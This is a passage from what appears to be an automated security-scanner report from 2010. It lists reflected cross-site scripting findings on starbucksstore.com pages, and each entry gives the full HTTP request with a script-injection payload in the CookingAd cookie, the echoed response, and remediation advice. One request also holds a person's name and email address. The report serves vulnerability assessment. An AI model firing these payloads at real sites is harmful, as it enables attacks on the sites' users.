Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBda449</script><script>alert(1)</script>9e10653ba75;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21134
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:23 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
eName="Equipment Homepage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Equipment Homepage"
   var s_prop3="SBPTPAHP1SHTBDA449</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9E10653BA75"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/coffee-machines/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   
...[SNIP]...

3.78. http://www.starbucksstore.com/default.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /default.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8163c</script><script>alert(1)</script>ec3893ac889 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /default.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB8163c</script><script>alert(1)</script>ec3893ac889;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21224
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:50 GMT
Connection: close

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="F
...[SNIP]...
ines. */
   var s_pageName="HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="HomePage"
   var s_prop3="SBPTPAHP1SHTB8163C</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>EC3893AC889"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_state=""

...[SNIP]...

3.79. http://www.starbucksstore.com/entertainment [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /entertainment

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdb1e</script><script>alert(1)</script>221b4ee20e3 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entertainment HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBcdb1e</script><script>alert(1)</script>221b4ee20e3;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16383
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:01 GMT
Connection: close

<!--S1--><!--S0-->    
       <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="description" conte
...[SNIP]...
rbucks Entertainment"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Entertainment"
   var s_prop3="SBPTPAHP1SHTBCDB1E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>221B4EE20E3"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/entertainment/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   va
...[SNIP]...

3.80. http://www.starbucksstore.com/entertainment/ [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /entertainment/

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 687ff</script><script>alert(1)</script>a3b2dc7f084 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entertainment/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB687ff</script><script>alert(1)</script>a3b2dc7f084;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16383
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:44:12 GMT
Connection: close

<!--S1--><!--S0-->    
       <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="description" conte
...[SNIP]...
rbucks Entertainment"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Entertainment"
   var s_prop3="SBPTPAHP1SHTB687FF</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>A3B2DC7F084"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/entertainment/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   va
...[SNIP]...

3.81. http://www.starbucksstore.com/extras/newsletters.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /extras/newsletters.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b33f</script><script>alert(1)</script>b422eca8919 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /extras/newsletters.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB2b33f</script><script>alert(1)</script>b422eca8919;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16365
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:14 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
ame="/extras/newsletters.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/extras/newsletters.asp"
   var s_prop3="SBPTPAHP1SHTB2B33F</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>B422ECA8919"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/extras/newsletters.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s
...[SNIP]...

3.82. http://www.starbucksstore.com/guestassist/ga_faq_shipop.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/ga_faq_shipop.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30c1e</script><script>alert(1)</script>c2c9791a405 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /guestassist/ga_faq_shipop.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB30c1e</script><script>alert(1)</script>c2c9791a405;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42766
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:31 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
ist/ga_faq_shipop.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/guestassist/ga_faq_shipop.asp"
   var s_prop3="SBPTPAHP1SHTB30C1E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>C2C9791A405"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/guestassist/ga_faq_shipop.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
...[SNIP]...

3.83. http://www.starbucksstore.com/guestassist/gareturns.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/gareturns.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1de33</script><script>alert(1)</script>0be688d889d was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /guestassist/gareturns.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB1de33</script><script>alert(1)</script>0be688d889d;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15086
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:32 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
guestassist/gareturns.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/guestassist/gareturns.asp"
   var s_prop3="SBPTPAHP1SHTB1DE33</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>0BE688D889D"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/guestassist/gareturns.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   va
...[SNIP]...

3.84. http://www.starbucksstore.com/guestassist/shcontus.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/shcontus.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a945e</script><script>alert(1)</script>f60d28581e3 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /guestassist/shcontus.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBa945e</script><script>alert(1)</script>f60d28581e3;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20651
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:23 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
"/guestassist/shcontus.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/guestassist/shcontus.asp"
   var s_prop3="SBPTPAHP1SHTBA945E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>F60D28581E3"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/guestassist/shcontus.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var
...[SNIP]...

3.85. http://www.starbucksstore.com/guestassist/shgaemailconfirm.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/shgaemailconfirm.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78a7c</script><script>alert(1)</script>702f5512ffc was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /guestassist/shgaemailconfirm.asp HTTP/1.1
Host: www.starbucksstore.com
Proxy-Connection: keep-alive
Referer: http://www.starbucksstore.com/guestassist/shgaform.asp
Cache-Control: max-age=0
Origin: http://www.starbucksstore.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CookingAd=Version=1%2E0&CCAID=SBDirect78a7c</script><script>alert(1)</script>702f5512ffc; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=Direct; SITESERVER=Version=1%2E0&ID=AC3A5C5B95534FDD921B69406EFD3A13; ASPSESSIONIDCABCBCAB=HFGLDLCBGCDBDIJEHPIPCKKA; __utmz=9087863.1289934824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1312787331-1289934823813; ASPSESSIONIDACACCDBA=POGLDLCBAAAEGEBIMPBBLEID; s_cc=true; __utma=9087863.993059575.1289934824.1289934824.1289934824.1; __utmc=9087863; __utmb=9087863.2.10.1289934824; s_sq=cookstarbucksstore%3D%2526pid%253D/guestassist/shgaform.asp%2526pidt%253D1%2526oid%253Dhttp%25253A//iweb.starbucksstore.com//images/starbucks/btn_submit2.gif%2526ot%253DIMAGE
Content-Length: 628

txtFirstName=Hoyt&txtMidInitial=&txtLastName=LLC&txtEMailAddress=h02332%40gmail.com&cboSubTopics=5&txtareaMessage=Hello+and+Good+Day-%0D%0A%0D%0AHoyt+LLC+from+David%2C+Ma..+this+is+David..%0D%0A2+issu
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12638
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSCDCCADA=FDGBELCBEJODMBJCBCCHOEDB; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:43:09 GMT

<!--S1--><!--S0-->
   

<!-- Common Function include file -->

<!-- EMail include file -->


<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HT
...[SNIP]...
st/shgaemailconfirm.asp"
   var s_setRef=""
   var s_server="10.11.5.101"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/guestassist/shgaemailconfirm.asp"
   var s_prop3="SBDIRECT78A7C</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>702F5512FFC"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/guestassist/shgaemailconfirm.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=
...[SNIP]...

3.86. http://www.starbucksstore.com/guestassist/shgaform.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/shgaform.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52800</script><script>alert(1)</script>53ab4bb2221921484 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /guestassist/shgaform.asp?cboSubjects=1000&cboSubTopics=100&EMail.x=67&EMail.y=7 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucksstore.com/guestassist/shcontus.asp
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB52800</script><script>alert(1)</script>53ab4bb2221921484; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDACACCDBA=LNFLDLCBOHDNPNFKEGCPKHPK

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20750
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSAADCCCB=LODAELCBDOILFIIPEOEHDGFF; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:26:07 GMT

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
"/guestassist/shcontus.asp"
   var s_setRef=""
   var s_server="10.11.5.101"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/guestassist/shcontus.asp"
   var s_prop3="SBPTPAHP1SHTB52800</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>53AB4BB2221921484"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/guestassist/shcontus.asp?error=noselection"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s
...[SNIP]...

3.87. http://www.starbucksstore.com/mya/links.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /mya/links.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddee2</script><script>alert(1)</script>8b507b6fff0 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mya/links.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBddee2</script><script>alert(1)</script>8b507b6fff0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15659
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:05 GMT
Connection: close

<!--S1--><!--S0-->
<!--INCLUDE VIRTUAL ="/registry/include/funcsRegistry.asp"-->


<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Cont
...[SNIP]...
. */
   var s_pageName="/mya/links.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/mya/links.asp"
   var s_prop3="SBPTPAHP1SHTBDDEE2</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>8B507B6FFF0"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/mya/links.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_state=""
...[SNIP]...

